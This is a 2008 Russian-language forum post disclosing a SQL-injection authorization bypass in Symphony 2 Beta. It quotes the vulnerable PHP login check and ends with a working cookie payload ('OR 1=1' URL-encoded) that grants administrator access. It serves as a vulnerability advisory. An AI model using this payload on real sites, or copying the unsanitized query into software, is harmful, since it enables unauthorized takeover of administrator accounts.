Symphony 2 Beta Admin Autorization Bypass

Symphony 2 Beta Admin Authorization Bypass

06.08.2008, 21:10

[Raz0r]

Members of Antichat - Level 5

Регистрация: 25.02.2007

Сообщений: 495

Провел на форуме:
3244717

Репутация: 1980

Symphony 2 Beta Admin Authorization Bypass

Сайт разработчика: http://21degrees.com.au/
Уязвимые версии: Symphony 2 Beta до revision 5
Уязвимый код в /symphony/lib/core/class.symphony.php@126-142:

PHP код:


		
			
<?php

public function isLoggedIn(){

  $un = $this->Cookie->get('username');

  $pw = $this->Cookie->get('pass');

  $id = $this->Database->fetchVar('id', 0, "SELECT `id` FROM `tbl_authors`

    WHERE `username` = '$un' AND `password` = '$pw' LIMIT 1");

  if($id){

    /* [...] */

  }

/* [...] */

}

?>

Описание: данные в переменных $un (username) и $pw (password) не проверяются должным образом перед извлечением из массива $_COOKIE, что ведет к SQL-инъекции, позволяющей обойти авторизацию пользователей и получить права администратора. Для удачного осуществления атаки magic_quotes_gpc=off не требуется, так как система убирает все дополнительные слэши сама.
Эксплоит: sym-[username]=%27+OR+1%3D1%2F%2A (необходимо передать в cookie)

Последний раз редактировалось [Raz0r]; 06.08.2008 в 22:20..